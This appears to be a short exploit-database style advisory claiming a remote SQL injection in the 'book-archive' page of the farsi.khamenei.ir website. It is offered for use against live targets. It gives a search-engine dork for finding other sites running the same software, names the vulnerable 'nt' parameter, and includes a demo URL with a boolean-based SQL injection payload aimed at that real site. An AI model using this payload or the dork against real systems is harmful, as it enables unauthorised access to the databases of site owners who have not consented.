Khamenei.ir suffers from a remote SQL injection vulnerability.
17d6bc18adc607b89ff1fc1ffd9f720c################################################## ################################################## #####################
# #
# Exploit Title : Khamenei.ir has SQL Inj vulnerabilities #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Portal Link : khamenei.ir (https://farsi.khamenei.ir) #
# #
# Tested ON : Persian language version Host #
# #
# Security Risk : ~[Critical]~ #
# #
# Description : Description: All websites with this version used can be targeted #
# #
# DorK : "intext:"book-archive?nt="" #
# #
# #
# #
################################################## ################################################## #####################
Details :
the vulnerable file is "book-archive"
SQL Inj Expl0iTs :
https://farsi.khamenei.ir/book-archive?nt=99999999 Codes
Dem0 :
https://farsi.khamenei.ir/book-archive?nt=99999999%27 oR 6168693=6168693 aNd %276199%27=%276199